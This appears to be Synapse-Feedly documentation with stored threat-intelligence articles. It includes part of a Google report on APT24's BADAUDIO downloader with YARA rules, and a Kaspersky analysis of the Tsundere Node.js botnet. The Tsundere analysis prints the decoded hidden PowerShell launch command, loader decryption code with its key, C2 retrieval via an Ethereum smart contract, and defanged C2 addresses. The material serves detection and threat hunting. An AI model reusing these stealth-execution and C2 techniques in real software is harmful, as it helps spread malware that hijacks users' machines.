                We are committed to sharing our findings with the security community to raise awareness and to disrupt this activity. We hope that improved understanding of tactics and techniques will enhance threat hunting capabilities and lead to stronger user protections across the industry.
                Acknowledgements
                This analysis would not have been possible without the assistance from FLARE. We would like to specifically thank Ray Leong, Jay Gibble and Jon Daniels for their contributions to the analysis and detections for BADAUDIO.
                Indicators of Compromise
                A Google Threat Intelligence (GTI) collection of related IOCs is available to registered users.
                Strategic Web Compromise JS
                Strategic Web Compromise — Modified Supplier JS
                BADAUDIO Binaries
                Strategic Web Compromise — Stage 2
                BADAUDIO C2
                Cobalt Strike Beacon Watermark
                Watermark_Hash: BeudtKgqnlm0Ruvf+VYxuw==
                YARA Rules
                rule G_Downloader_BADAUDIO_1 {
                    meta:
                            author = "Google Threat Intelligence Group (GTIG)"
                    strings:
                            $string_decode = { 0F 28 [1-5] 0F 29 [1-5] 0F 28 [1-5] 0F 28 [1-5] 0F 28 [1-5] 0F 55 ?? 0F 55 ?? 0F 56 ?? 0F 28 ?? 0F 55 ?? 0F 55 ?? 0F 56 ?? 0F 57 ?? 0F 2? [1-5] 0F 2? [1-5] 0F 2? }
                            $s1 = "SystemFunction036" fullword
                            $s2_b64marker = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" fullword
                            $control_flow_obfuscation = { 66 2E 0F 1F 84 00 00 00 00 00 81 [5] 7? ?? 81 [5] 7? ?? 81 [5] 7? }
                    condition:
                            uint16(0) == 0x5a4d and all of them and #string_decode > 2 and #control_flow_obfuscation > 2
                }
                rule G_Downloader_BADAUDIO_2 {
                    meta:
                            author = "Google Threat Intelligence Group (GTIG)"
                    strings:
                            $c_string_decode = { C5 F8 28 [1-24] C5 F8 57 [1-8] 0F 94 [4-128] C5 F8 29 [1-64] C5 F8 29 [1-24] C5 F8 57 [1-8] 0F 94 }
                            $s1 = "SystemFunction036" fullword
                            $s2_b64marker = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" fullword
                            $control_flow_obfuscation = { 66 2E 0F 1F 84 00 00 00 00 00 81 [5] 7? ?? 81 [5] 7? ?? 81 [5] 7? }
                            $c_part_of_control_flow_obfuscation_and_string_decode = { C5 F8 28 [1-5] 8B 46 ?? C5 F8 57 40 }
                    condition:
                            uint16(0) == 0x5a4d and all of ($s*) and #control_flow_obfuscation > 2 and ($c_string_decode or (#c_part_of_control_flow_obfuscation_and_string_decode > 5 and #c_part_of_control_flow_obfuscation_and_string_decode > 20))
                }
                rule G_APT_DOWNLOADER_BADAUDIO_3 {
                    meta:
                            author = "Google Threat Intelligence Group (GTIG)"
                    strings:
                            $s1 = "SystemFunction036"
                            $s2 = "6666666666666666\\\\\\\\\\\\\\\\\\"
                            $dc1 = {C1 C2 1A ?? ?? C1 C3 15 31 D3 ?? ?? C1 C2 07}
                            $dc2 = {C1 C1 1E ?? ?? C1 C6 13 ?? ?? C1 C0 0A 31}
                            $dc3 = {C1 C5 19 C1 C7 0E 01 ?? ?? ?? 31 EF C1 EB 03 31}
                            $dc4 = {C1 C7 0F 8B ?? ?? ?? ?? ?? C1 C3 0D 31 FB C1 EA 0A 31}
                            $f2 = /\x0F\x4C\xC1\x3D[\x01-\xFF].{3}([\x70-\x7f].|\x0f[\x80-\x8f].{4})\x3D[\x01-\xFF].{3}([\x70-\x7f].|\x0f[\x80-\x8f].{4})\x3D[\x01-\xFF].{3}([\x70-\x7f].|\x0f[\x80-\x8f].{4})\x3D[\x01-\xFF].{3}([\x70-\x7f].|\x0f[\x80-\x8f].{4})\x3D[\x01-\xFF].{3}([\x70-\x7f].|\x0f[\x80-\x8f].{4})/
                    condition:
                            all of ($s*) and 3 of ($dc*) and uint16(0) == 0x5A4D and (#f1 > 5 or #f2 > 2) and filesize<10MB
                }
                rule G_APT_DOWNLOADER_BADAUDIO_4 {
                    meta:
                            author = "Google Threat Intelligence Group (GTIG)"
                    strings:
                            $p00_0 = {8d4d??e8[4]8b7d??83c6??eb??c745[5]e8[4]8b4d??64890d}
                            $p00_1 = {568b7c24??8b7424??8b5424??89f1e8[4]f20f1007f20f104f??f20f118e}
                    condition:
                            uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and
                            (
                                ($p00_0 in (0..1100000) and $p00_1 in (0..990000))
                            )
                }
        :ext:id = T8Gn8hJy9MDXgPPEWPf3eKFiC22pQg9/jkwNHgMRBDU=_19aa2f62780:5c803d7:3cb6bc74
        :summary = PRC-nexus APT24 uses BADAUDIO malware in a persistent, multi-vector espionage campaign targeting Taiwan.
        :title = apt24's pivot to multi-vector attacks
        :topics = ['crime', 'cyber crime', 'cyber security', 'domain indicators of compromise', 'hacking', 'hash indicators of compromise', 'indicators of compromise', 'malware', 'threat intelligence reports', 'url indicators of compromise', 'yara rules']
        :url = https://cloud.google.com/blog/topics/threat-intelligence/apt24-pivot-to-multi-vector-attacks
        :url:fqdn = cloud.google.com
media:news=78304cff5d449b48b1a1f955e3e10952
        .created = 2025/11/28 18:24:04.018
        :authors =
        :body = Introduction
                Tsundere is a new botnet, discovered by our Kaspersky GReAT around mid-2025. We have correlated this threat with previous reports from October 2024 that reveal code similarities, as well as the use of the same C2 retrieval method and wallet. In that instance, the threat actor created malicious Node.js packages and used the Node Package Manager (npm) to deliver the payload. The packages were named similarly to popular packages, employing a technique known as typosquatting. The threat actor targeted libraries such as Puppeteer, Bignum.js, and various cryptocurrency packages, resulting in 287 identified malware packages. This supply chain attack affected Windows, Linux, and macOS users, but it was short-lived, as the packages were removed and the threat actor abandoned this infection method after being detected.
                The threat actor resurfaced around July 2025 with a new threat. We have dubbed it the Tsundere bot after its C2 panel. This botnet is currently expanding and poses an active threat to Windows users.
                Initial infection
                Currently, there is no conclusive evidence on how the Tsundere bot implants are being spread. However, in one documented case, the implant was installed via a Remote Monitoring and Management (RMM) tool, which downloaded a file named pdf.msi from a compromised website. In other instances, the sample names suggest that the implants are being disseminated using the lure of popular Windows games, particularly first-person shooters. The samples found in the wild have names such as “valorant”, “cs2”, or “r6x”, which appear to be attempts to capitalize on the popularity of these games among piracy communities.
                Malware implants
                According to the C2 panel, there are two distinct formats for spreading the implant: via an MSI installer and via a PowerShell script. Implants are automatically generated by the C2 panel (as described in the Infrastructure section).
                MSI installer
                The MSI installer was often disguised as a fake installer for popular games and other software to lure new victims. Notably, at the time of our research, it had a very low detection rate.
                The installer contains a list of data and JavaScript files that are updated with each new build, as well as the necessary Node.js executables to run these scripts. The following is a list of files included in the sample:
                nodejs/B4jHWzJnlABB2B7
                nodejs/UYE20NBBzyFhqAQ.js
                nodejs/79juqlY2mETeQOc
                nodejs/thoJahgqObmWWA2
                nodejs/node.exe
                nodejs/npm.cmd
                nodejs/npx.cmd
                The last three files in the list are legitimate Node.js files. They are installed alongside the malicious artifacts in the user’s AppData\Local\nodejs directory.
                An examination of the CustomAction table reveals the process by which Windows Installer executes the malware and installs the Tsundere bot:
                RunModulesSetup    1058    NodeDir    powershell -WindowStyle Hidden -NoLogo -enc JABuAG[...]ACkAOwAiAA==
                After Base64 decoding, the command appears as follows:
                $nodePath = "$env:LOCALAPPDATA\nodejs\node.exe";
                & $nodePath -e "const { spawn } = require('child_process'); spawn(process.env.LOCALAPPDATA + '\\nodejs\\node.exe', ['B4jHWzJnlABB2B7'], { detached: true, stdio: 'ignore', windowsHide: true, cwd: __dirname }).unref();"
                This will execute Node.js code that spawns a new Node.js process, which runs the loader JavaScript code (in this case, B4jHWzJnlABB2B7). The resulting child process runs in the background, remaining hidden from the user.
                Loader script
                The loader script is responsible for ensuring the correct decryption and execution of the main bot script, which handles npm unpackaging and configuration. Although the loader code, similar to the code for the other JavaScript files, is obfuscated, it can be deobfuscated using open-source tools. Once executed, the loader attempts to locate the unpackaging script and configuration for the Tsundere bot, decrypts them using the AES-256 CBC cryptographic algorithm with a build-specific key and nonce, and saves the decrypted files under different filenames.
                encScriptPath = 'thoJahgqObmWWA2',
                encConfigPath = '79juqlY2mETeQOc',
                decScript = 'uB39hFJ6YS8L2Fd',
                decConfig = '9s9IxB5AbDj4Pmw',
                keyBase64 = '2l+jfiPEJufKA1bmMTesfxcBmQwFmmamIGM0b4YfkPQ=',
                ivBase64 = 'NxrqwWI+zQB+XL4+I/042A==',
                [...]
                const h = path.dirname(encScriptPath),
                i = path.join(h, decScript),
                j = path.join(h, decConfig)
                decryptFile(encScriptPath, i, key, iv)
                decryptFile(encConfigPath, j, key, iv)
                The configuration file is a JSON that defines a directory and file structure, as well as file contents, which the malware will recreate. The malware author refers to this file as “config”, but its primary purpose is to package and deploy the Node.js package manager (npm) without requiring manual installation or downloading. The unpackaging script is responsible for recreating this structure, including the node_modules directory with all its libraries, which contains packages necessary for the malware to run.
                With the environment now set up, the malware proceeds to install three packages to the node_modules directory using npm:
                ws: a WebSocket networking library
                ethers: a library for communicating with Ethereum
                pm2: a Node.js process management tool
                Loader script installing the necessary toolset for Tsundere persistence and execution
                The pm2 package is installed to ensure the Tsundere bot remains active and is used to launch the bot. Additionally, pm2 helps achieve persistence on the system by writing to the registry and configuring itself to restart the process upon login.
                PowerShell infector
                The PowerShell version of the infector operates in a more compact and simplified manner. Instead of utilizing a configuration file and an unpacker — as done with the MSI installer — it downloads the ZIP file node-v18.17.0-win-x64.zip from the official Node.js website nodejs[.]org and extracts it to the AppData\Local\NodeJS directory, ultimately deploying Node.js on the targeted device. The infector then uses the AES-256-CBC algorithm to decrypt two large hexadecimal-encoded variables, which correspond to the bot script and a persistence script. These decrypted files, along with a package.json file, are written to the disk. The package.json file contains information about the malicious Node.js package, as well as the necessary libraries to be installed, including the ws and ethers packages. Finally, the infector runs both scripts, starting with the persistence script, which is followed by the bot script.
                The PowerShell infector creates a package file with the implant dependencies
                Persistence is achieved through the same mechanism observed in the MSI installer: the script creates a value in the HKCU:\Software\Microsoft\Windows\CurrentVersion\Run registry key that points to itself. It then overwrites itself with a new script that is Base64 decoded. This new script is responsible for ensuring the bot is executed on each login by spawning a new instance of the bot.
                Tsundere bot
                We will now delve into the Tsundere bot, examining its communication with the command-and-control (C2) server and its primary functionality.
                C2 address retrieval
                Web3 contracts, also known as smart contracts, are deployed on a blockchain via transactions from a wallet. These contracts can store data in variables, which can be modified by functions defined within the contract. In this case, the Tsundere botnet utilizes the Ethereum blockchain, where a method named setString(string _str) is defined to modify the state variable param1, allowing it to store a string. The string stored in param1 is used by the Tsundere botnet administrators to store new WebSocket C2 servers, which can be rotated at will and are immutable once written to the Ethereum blockchain.
                The Tsundere botnet relies on two constant points of reference on the Ethereum blockchain:
                Wallet: 0x73625B6cdFECC81A4899D221C732E1f73e504a32
                Contract: 0xa1b40044EBc2794f207D45143Bd82a1B86156c6b
                In order to change the C2 server, the Tsundere botnet makes a transaction to update the state variable with a new address. Below is a transaction made on August 19, 2025, with a value of 0 ETH, which updates the address.
                Smart contract containing the Tsundere botnet WebSocket C2
                The state variable has a fixed length of 32 bytes, and a string of 24 bytes (see item [2] in the previous image) is stored within it. When this string is converted from hexadecimal to ASCII, it reveals the new WebSocket C2 server address: ws[:]//185.28.119[.]179:1234.
                To obtain the C2 address, the bot contacts various public endpoints that provide remote procedure call (RPC) APIs, allowing them to interact with Ethereum blockchain nodes. At the start of the script, the bot calls a function named fetchAndUpdateIP, which iterates through a list of RPC providers. For each provider, it checks the transactions associated with the contract address and wallet owner, and then retrieves the string from the state variable containing the WebSocket address, as previously observed.
                Malware code for retrieval of C2 from the smart contract
                The Tsundere bot verifies that the C2 address starts with either ws:// or wss:// to ensure it is a valid WebSocket URL, and then sets the obtained string as the server URL. But before using this new URL, the bot first checks the system locale by retrieving the culture name of the machine to avoid infecting systems in the CIS region. If the system is not in the CIS region, the bot establishes a connection to the server via a WebSocket, setting up the necessary handlers for receiving, sending, and managing connection states, such as errors and closed sockets.
                Bot handlers for communication
                Communication
                The communication flow between the client (Tsundere bot) and the server (WebSocket C2) is as follows:
                The Tsundere bot establishes a WebSocket connection with the retrieved C2 address.
                An AES key is transmitted immediately after the connection is established.
                The bot sends an empty string to confirm receipt of the key.
                The server then sends a nonce (IV), enabling the use of encrypted communication from that point on.
                Encryption is required for all subsequent communication.
                The bot transmits the OS information of the infected machine, including the MAC address, total memory, GPU information, and other details. This information is also used to generate a unique identifier (UUID).
                The C2 server responds with a JSON object, acknowledging the connection and confirming the bot’s presence.
                With the connection established, the client and server can exchange information freely.
                To maintain the connection, keep-alive messages are sent every minute using ping/pong messages.
                The bot sends encrypted responses as part of the ping/pong messages, ensuring continuous communication.
                Tsundere communication process with the C2 via WebSockets
                The connections are not authenticated through any additional means, making it possible for a fake client to establish a connection.
                As previously mentioned, the client sends an encrypted ping message to the C2 server every minute, which returns a pong message. This ping-pong exchange serves as a mechanism for the C2 panel to maintain a list of currently active bots.
                Functionality
                The Tsundere bot is designed to allow the C2 server to send dynamic JavaScript code. When the C2 server sends a message with ID=1 to the bot, the message is evaluated as a new function and then executed. The result of this operation is sent back to the server via a custom function named serverSend, which is responsible for transmitting the result as a JSON object, encrypted for secure communication.
                Tsundere bot evaluation code once functions are received from the C2
                The ability to evaluate code makes the Tsundere bot relatively simple, but it also provides flexibility and dynamism, allowing the botnet administrators to adapt it to a wide range of actions.
                However, during our observation period, we did not receive any commands or functions from the C2 server, possibly because the newly connected bot needed to be requested by other threat actors through the botnet panel before it could be utilized.
                Infrastructure
                The Tsundere bot utilizes WebSocket as its primary protocol for establishing connections with the C2 server. As mentioned earlier, at the time of writing, the malware was communicating with the WebSocket server located at 185.28.119[.]179, and our tests indicated that it was responding positively to bot connections.
                The following table lists the IP addresses and ports extracted from the provided list of URLs:
                IP                 Port  First seen (contract update)  ASN
                185.28.119[.]179   1234  2025-08-19                    AS62005
                196.251.72[.]192   1234  2025-08-03                    AS401120
                103.246.145[.]201  1234  2025-07-14                    AS211381
                193.24.123[.]68    3011  2025-06-21                    AS200593
                62.60.226[.]179    3001  2025-05-04                    AS214351
                Marketplace and control panel
                No business is complete without a marketplace, and similarly, no botnet is complete without a control panel. The Tsundere botnet has both a marketplace and a control panel, which are integrated into the same frontend.
                Tsundere botnet panel login
                The notable aspect of Tsundere’s control panel, dubbed “Tsundere Netto” (version 2.4.4), is that it has an open registration system. Any user who accesses the login form can register and gain access to the panel, which features various tabs:
                Bots: a dashboard displaying the number of bots under the user’s control
                Settings: user settings and administrative functions
                Build: if the user has an active license, they can create new bots using the two previously mentioned methodologies (MSI or PowerShell)
                Market: this is the most interesting aspect of the panel, as it allows users to promote their individual bots and offer various services and functionalities to other threat actors. Each build can create a bot that performs a specific set of actions, which can then be offered to others
                Monero wallet: a wallet service that enables users to make deposits or withdrawals
                Socks proxy: a feature that allows users to utilize their bots as proxies for their traffic
                Tsundere botnet control panel, building system and market
                Each build generates a unique build ID, which is embedded in the implant and sent to the C2 server upon infection. This build ID can be linked to the user who created it. According to our research and analysis of other URLs found in the wild, builds are created through the panel and can be downloaded via the URL:
                hxxps://idk.1f2e[REDACTED]07a4[.]net/api/builds/{BUILD-ID}.msi
                At the time of writing this, the panel typically has between 90 and 115 bots connected to the C2 server at any given time.
                Attribution
                Based on the text found in the implants, we can conclude with high confidence that the threat actor behind the Tsundere botnet is likely Russian-speaking. The use of the Russian language in the implants is consistent with previous attacks attributed to the same threat actor.
                Russian being used throughout the code
                Furthermore, our analysis suggests a connection between the Tsundere botnet and the 123 Stealer, a C++-based stealer available on the shadow market for $120 per month. This connection is based on the fact that both panels share the same server. Notably, the main domain serves as the frontend for the 123 Stealer panel, while the subdomain “idk.” is used for the Tsundere botnet panel.
                123 Stealer C2 panel sharing Tsundere’s infrastructure and showcasing its author
                By examining the available evidence, we can link both threats to a Russian-speaking threat actor known as “koneko”. Koneko was previously active on a dark web forum, where they promoted the 123 Stealer, as well as other malware, including a backdoor. Although our analysis of the backdoor revealed that it was not directly related to Tsundere, it shared similarities with the Tsundere botnet in that it was written in Node.js and used PowerShell or MSI as infectors. Before the dark web forum was seized and shut down, koneko’s profile featured the title “node malware senior”, further suggesting their expertise in Node.js-based malware.
                Conclusion
                The Tsundere botnet represents a renewed effort by a presumably identified threat actor to revamp their toolset. The Node.js-based bot is an evolution of an attack discovered in October of last year, and it now features a new strategy and even a new business model. Infections can occur through MSI and PowerShell files, which provides flexibility in terms of disguising installers, using phishing as a point of entry, or integrating with other attack mechanisms, making it an even more formidable threat.
                Additionally, the botnet leverages a technique that is gaining popularity: utilizing web3 contracts, also known as “smart contracts”, to host command-and-control (C2) addresses, which enhances the resilience of the botnet infrastructure. The botnet’s possible author, koneko, is also involved in peddling other threats, such as the 123 Stealer, which suggests that the threat is likely to escalate rather than diminish in the coming months. As a result, it is essential to closely monitor this threat and be vigilant for related threats that may emerge in the near future.
                Indicators of compromise
                More IoCs related to this threat are available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.
                File hashes
                File paths
                %APPDATA%\Local\NodeJS
                Domains and IPs
                ws://185.28.119[.]179:1234
                ws://196.251.72[.]192:1234
                ws://103.246.145[.]201:1234
                ws://193.24.123[.]68:3011
                ws://62.60.226[.]179:3001
                Cryptocurrency wallets
                Note: These are wallets that have changed the C2 address in the smart contract since it was created.
        :ext:id = T8Gn8hJy9MDXgPPEWPf3eKFiC22pQg9/jkwNHgMRBDU=_19aa2bebe43:5c0ccab:3cb6bc74
        :summary = Kaspersky GReAT experts discovered a new campaign featuring the Tsundere botnet. Node.js-based bots abuse web3 smart contracts and are spread via MSI installers and PowerShell scripts.
        :title = the tsundere botnet uses the ethereum blockchain to infect its targets
        :topics = ['crypto', 'cyber crime', 'cyber security', 'email address indicators of compromise', 'hacking', 'hash indicators of compromise', 'indicators of compromise', 'ip indicators of compromise', 'malware', 'threat intelligence reports', 'url indicators of compromise', 'use cases']
        :url = https://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/
        :url:fqdn = securelist.com

Use of meta:source nodes

Synapse-Feedly uses a meta:source node and -(seen)> lightweight edges to track nodes observed from the Feedly API.

> meta:source=65f646d730ffa68037a6f23c28c5340d
meta:source=65f646d730ffa68037a6f23c28c5340d
        .created = 2025/11/28 18:24:03.318
        :name = feedly api
        :type = synapse.feedly

Storm can filter query results to include or exclude nodes that have been observed by Synapse-Feedly. The following example shows how to filter the results of a query to include only nodes observed by Synapse-Feedly:

> #cool.tag.lift +{ <(seen)- meta:source=65f646d730ffa68037a6f23c28c5340d }
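A few further Storm queries, added here as an example rather than taken from the Synapse-Feedly documentation, that reuse the same meta:source iden shown above to exclude Feedly-observed nodes, to walk from the source to everything it has seen, and to lift the feeds that reference it through their :source property:

```storm
// Exclude nodes observed by Synapse-Feedly from a tag lift
// (assumes the meta:source iden shown in the output above)
#cool.tag.lift -{ <(seen)- meta:source=65f646d730ffa68037a6f23c28c5340d }

// Walk the seen edges from the source to every node Synapse-Feedly
// has observed, for example to review or tag them in bulk
meta:source=65f646d730ffa68037a6f23c28c5340d -(seen)> *

// Lift the meta:feed nodes whose :source property points at the
// Synapse-Feedly source (the property is visible in the feed output above)
meta:feed:source=65f646d730ffa68037a6f23c28c5340d
```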